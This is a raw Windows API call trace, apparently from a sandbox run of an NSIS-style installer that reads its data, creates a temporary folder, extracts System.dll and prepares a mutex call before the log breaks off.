[0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, 
lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, 
lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | 
out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] SetFilePointer (in: hFile=0x174, lDistanceToMove=36892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x901c [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x18fdb4, nNumberOfBytesToRead=0x4, 
lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x18fdb4*, lpNumberOfBytesRead=0x18fd30*=0x4, lpOverlapped=0x0) returned 1 [0157.834] GetTickCount () returned 0x2fd9f [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x415428, nNumberOfBytesToRead=0x1769, lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x415428*, lpNumberOfBytesRead=0x18fd30*=0x1769, lpOverlapped=0x0) returned 1 [0157.835] GetTickCount () returned 0x2fd9f [0157.835] SetFilePointer (in: hFile=0x174, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa789 [0157.835] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75c90000 [0157.835] GetProcAddress (hModule=0x75c90000, lpProcName="GetUserDefaultUILanguage") returned 0x75ca44ab [0157.835] GetUserDefaultUILanguage () returned 0x409 [0157.835] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0157.835] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0157.835] lstrlenA (lpString="Name") returned 4 [0157.835] lstrcpynA (in: lpString1=0x42ec00, lpString2="Name Setup", iMaxLength=1024 | out: lpString1="Name Setup") returned="Name Setup" [0157.835] SetWindowTextA (hWnd=0x0, lpString="Name Setup") returned 0 [0157.835] lstrcpynA (in: lpString1=0x314ffc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0157.835] lstrcpynA (in: lpString1=0x42bc78, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrcpynA (in: lpString1=0x42bc78, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrcpynA (in: lpString1=0x435400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0xd022d [0157.836] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrlenA (lpString="") returned 0 
[0157.836] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.839] lstrcmpiA (lpString1="", lpString2="") returned 0 [0157.839] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.839] lstrlenA (lpString="") returned 0 [0157.839] lstrcpynA (in: lpString1=0x2fa28c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.839] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0157.839] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0157.839] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" [0157.839] GetTickCount () returned 0x2fdaf [0157.839] GetTempFileNameA (in: lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpPrefixString="nst", uUnique=0x0, lpTempFileName=0x430000 | out: lpTempFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 0xfdb0 [0157.840] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.840] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.840] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.840] lstrcpynA (in: lpString1=0x42bc78, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.840] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.840] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0157.840] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0157.840] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 1 [0157.841] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.841] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.841] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.841] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () returned 0xb7 [0157.841] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0157.841] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () 
returned 0xb7 [0157.841] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1")) returned 0x10 [0157.841] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () returned 0xb7 [0157.841] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata")) returned 0x2012 [0157.841] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () returned 0xb7 [0157.842] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local")) returned 0x2010 [0157.842] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0157.842] GetLastError () returned 0xb7 [0157.842] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0157.842] GetModuleHandleA (lpModuleName="SHELL32") returned 0x76880000 [0157.842] GetProcAddress (hModule=0x76880000, lpProcName=0x2a8) returned 0x768d44f5 [0157.842] IsUserAnAdmin () returned 0 [0157.842] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp"), lpSecurityAttributes=0x0) returned 1 [0157.843] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.843] lstrcpynA (in: 
lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.843] lstrcpynA (in: lpString1=0x436800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrcpynA (in: lpString1=0x430000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.843] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.843] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.843] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.843] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0xffffffff [0157.843] CreateFileA 
(lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0157.843] SetFilePointer (in: hFile=0x174, lDistanceToMove=42889, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa789 [0157.844] ReadFile (in: hFile=0x174, lpBuffer=0x18fbd8, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18fb54, lpOverlapped=0x0 | out: lpBuffer=0x18fbd8*, lpNumberOfBytesRead=0x18fb54*=0x4, lpOverlapped=0x0) returned 1 [0157.844] GetTickCount () returned 0x2fdaf [0157.844] ReadFile (in: hFile=0x174, lpBuffer=0x415428, nNumberOfBytesToRead=0x1aa2, lpNumberOfBytesRead=0x18fb54, lpOverlapped=0x0 | out: lpBuffer=0x415428*, lpNumberOfBytesRead=0x18fb54*=0x1aa2, lpOverlapped=0x0) returned 1 [0157.844] GetTickCount () returned 0x2fdaf [0157.844] MulDiv (nNumber=6818, nNumerator=100, nDenominator=6818) returned 100 [0157.844] wsprintfA (in: param_1=0x18fb70, param_2="... %d%%" | out: param_1="... 
100%") returned 8 [0157.844] WriteFile (in: hFile=0x180, lpBuffer=0x419428*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x18fb60, lpOverlapped=0x0 | out: lpBuffer=0x419428*, lpNumberOfBytesWritten=0x18fb60*=0x2e00, lpOverlapped=0x0) returned 1 [0157.845] CloseHandle (hObject=0x180) returned 1 [0157.846] lstrlenA (lpString="Name") returned 4 [0157.846] lstrcpynA (in: lpString1=0x2fa28c, lpString2="kernel32::CreateMutexA(i 0, i 0, t \"Name\") i .r1 ?e", iMaxLength=1024 | out: lpString1="kernel32::CreateMutexA(i 0, i 0, t \"Name\") i .r1 ?e") returned="kernel32::CreateMutexA(i 0, i 0, t \"Name\") i .r1 ?e" [0157.846] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.847] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.847] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 